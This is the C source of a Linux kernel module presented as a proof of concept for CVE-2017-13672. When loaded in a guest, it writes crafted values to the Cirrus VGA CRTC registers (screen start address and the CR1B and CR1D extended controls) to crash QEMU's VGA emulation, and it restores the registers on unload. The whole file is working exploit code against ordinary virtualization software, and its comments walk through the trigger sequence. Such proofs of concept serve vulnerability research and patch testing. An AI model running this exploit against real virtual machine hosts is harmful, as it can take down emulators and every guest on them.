#define LINUX
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <asm/io.h>
#define DRIVER_AUTHOR "David Buchanan"
#define DRIVER_DESC "CVE-2017-13672 POC"
/* From qemu/hw/display/vga_regs.h */
#define VGA_CRT_IC 0x3D4 /* CRT Controller Index - color emulation */
#define VGA_CRT_DC 0x3D5 /* CRT Controller Data Register - color emulation */
/* From CL-GD5446 Technical Reference Manual */
#define VGA_CRC 0x0C /* CRTC Screen Start Address High Register */
#define VGA_CRD 0x0D /* CRTC Screen Start Address Low Register */
#define VGA_CR1B 0x1B /* Extended Display Controls Register */
#define VGA_CR1D 0x1D /* Overlay Extended Control Register */
/*
 * Saved CRTC register contents. init_module() fills these in before it
 * modifies the registers; cleanup_module() writes them back on unload.
 */
unsigned char crc_bak;	/* CR0C: screen start address, high byte */
unsigned char crd_bak;	/* CR0D: screen start address, low byte */
unsigned char cr1b_bak;	/* CR1B: extended display controls */
unsigned char cr1d_bak;	/* CR1D: overlay extended control */
/*
 * Read one CRT Controller register through the VGA index/data port pair.
 *
 * @reg: CRTC register index, written to VGA_CRT_IC (0x3D4).
 * Returns the byte read back from VGA_CRT_DC (0x3D5).
 *
 * The index write and the data read are two separate port accesses with no
 * locking around them, so another user of the CRTC ports (the console
 * driver, for instance) could re-select the index in between. Acceptable
 * for a proof of concept, not for a real driver.
 */
unsigned char vga_crt_read(unsigned char reg) {
	unsigned char value;

	outb_p(reg, VGA_CRT_IC);
	value = inb_p(VGA_CRT_DC);

	return value;
}
/*
 * Write one CRT Controller register through the VGA index/data port pair.
 *
 * @val: byte to store in the selected register.
 * @reg: CRTC register index, written to VGA_CRT_IC (0x3D4) first.
 *
 * Same caveat as vga_crt_read(): the two port accesses are not atomic with
 * respect to other code driving the CRTC ports.
 */
void vga_crt_write(unsigned char val, unsigned char reg) {
	const unsigned short index_port = VGA_CRT_IC;
	const unsigned short data_port = VGA_CRT_DC;

	outb_p(reg, index_port);
	outb_p(val, data_port);
}
/*
 * Module entry point for the CVE-2017-13672 proof of concept.
 *
 * Snapshots the four CRTC registers that are about to be modified (so that
 * cleanup_module() can restore them), then programs the register values that
 * trigger the bug in QEMU's VGA emulation of the Cirrus CL-GD5446 register
 * set: both halves of the screen start address are set to 0xFF and extra
 * bits are OR-ed into CR1B and CR1D. The writes happen in a fixed order.
 *
 * Returns 0 so the module stays loaded. Nothing here reserves the port range
 * (no request_region()) or checks that a Cirrus-compatible VGA device is
 * present, so loading it on unrelated hardware may disturb the display.
 */
int init_module(void)
{
	static const unsigned char saved_regs[] = {
		VGA_CRC, VGA_CRD, VGA_CR1B, VGA_CR1D
	};
	unsigned char *const backups[] = {
		&crc_bak, &crd_bak, &cr1b_bak, &cr1d_bak
	};
	size_t i;

	printk(KERN_ALERT "Attempting to exploit CVE-2017-13672...\n");

	/* Read every register back before touching any of them. */
	for (i = 0; i < sizeof saved_regs / sizeof saved_regs[0]; i++)
		*backups[i] = vga_crt_read(saved_regs[i]);

	/* Screen start address: high byte, then low byte. */
	vga_crt_write(0xFF, VGA_CRC);
	vga_crt_write(0xFF, VGA_CRD);
	/* Extended display controls, keeping whatever bits were already set. */
	vga_crt_write(cr1b_bak | 0x0D, VGA_CR1B);
	/* Overlay extended control; usually only this bit needs to be set. */
	vga_crt_write(cr1d_bak | 0x80, VGA_CR1D);

	return 0;
}
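/*
 * Module exit: restore the CRTC registers saved by init_module().
 *
 * As the message itself says, reaching this point means the register writes
 * did not bring the emulator down. The message is now logged at KERN_ALERT,
 * the same level init_module() uses; the original call passed no log level
 * and therefore went out at the kernel's default level, which made the two
 * messages easy to separate in the log. Restoration is best-effort: the
 * values are written back in the order they were saved, and the display may
 * or may not recover.
 */
void cleanup_module(void)
{
	printk(KERN_ALERT "If you got this far, exploitation was unsuccessful. Attempting to unload CVE-2017-13672. This may or may not fix your graphics.\n");

	vga_crt_write(crc_bak, VGA_CRC);
	vga_crt_write(crd_bak, VGA_CRD);
	vga_crt_write(cr1b_bak, VGA_CR1B);
	vga_crt_write(cr1d_bak, VGA_CR1D);
}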
/* Module metadata shown by modinfo; author and description come from the
 * DRIVER_AUTHOR / DRIVER_DESC macros defined at the top of the file. */
MODULE_LICENSE("Dual MIT/GPL");
MODULE_AUTHOR(DRIVER_AUTHOR);
MODULE_DESCRIPTION(DRIVER_DESC);